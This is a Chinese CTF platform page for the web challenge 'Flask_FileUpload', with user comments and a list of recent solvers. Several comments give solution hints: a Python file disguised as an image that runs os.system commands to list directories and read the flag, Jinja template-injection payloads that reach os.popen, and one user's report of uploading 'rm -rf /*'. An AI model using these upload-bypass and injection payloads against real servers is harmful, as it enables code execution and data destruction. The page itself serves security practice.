Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12058
提  示:
描  述:
Flask_FileUpload
评论
uzzzzz 2年前

编写一个文件 test.py, 文件中的语句为: import os os.system('ls -lat ../') os.system('cat ../flag') 将文件名改成test.py.png, 在burpsuite中改包filename=test.png

回复 3

ttxs25830 3年前

草,我传了个rm -rf /* 上去,似乎没有都删掉,但是场景真炸了......

回复 6
GH0S7 2年前

hhhhhhhhhhhhhhhhhhhhhh

回复 0

bracket 3年前

oh.cool

回复 0

maomaoha1 3年前

Traceback (most recent call last) File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2464, in __call__ Open an interactive python shell in this framereturn self.wsgi_app(envi

回复 0

chengzhang 3年前

666

回复 0

·w· 3年前

我觉得好难啊

回复 2

nauyx 3年前

easy

回复 0

泡椒控卫 3年前

https://blog.csdn.net/m0_57954651/article/details/123335889?spm=1001.2014.3001.5501

回复 8

沐雨赏心 3年前

为什么我出现了这个 python3: can't open file '/app/upload/新建文本文档.jpg': [Errno 2] No such file or directory -->

回复 1
NYangY 3年前

文件名使用英文吧

回复 0

wangwenjie 3年前

在上传的jpg中写入,import os os.system('find /* |grep flag')来查找flag,之后在找到的内容中cat /flag就好了

回复 3

Shoejust13 3年前

print("t-->{{''.__class__.__mro__[-1].__subclasses__()[177].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}<!--t")#另解法

回复 2
timtoc 1年前

@1745090646 url/{{config.__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}},回车后页面显示404.not found是咋回事大佬

回复 0

1745090646 3年前

这个在那种回显容易看的那种好用,但是这道题,需要找子类在哪个位子,直接用{{config.__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}}就行,不过谢谢你让我想到这个方法

回复 3

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

苍穹璀璨 攻破了该题 6小时前
DOMAKE 攻破了该题 7小时前
jie123 攻破了该题 8小时前
翻斗花园突破手 攻破了该题 10小时前
reisen 攻破了该题 2天前
ABCDHBY 攻破了该题 3天前
流风jttqh 攻破了该题 4天前
1730980796 攻破了该题 4天前
llc123 攻破了该题 5天前
1163064874 攻破了该题 5天前
theo1234 攻破了该题 6天前
ash0x 攻破了该题 9天前
kttsy 攻破了该题 10天前
peach.peach 攻破了该题 10天前
3268798994 攻破了该题 11天前
SweetSour 攻破了该题 12天前
qieding 攻破了该题 13天前
JEB_Bem 攻破了该题 13天前
forces 攻破了该题 13天前
294903544 攻破了该题 15天前
问题反馈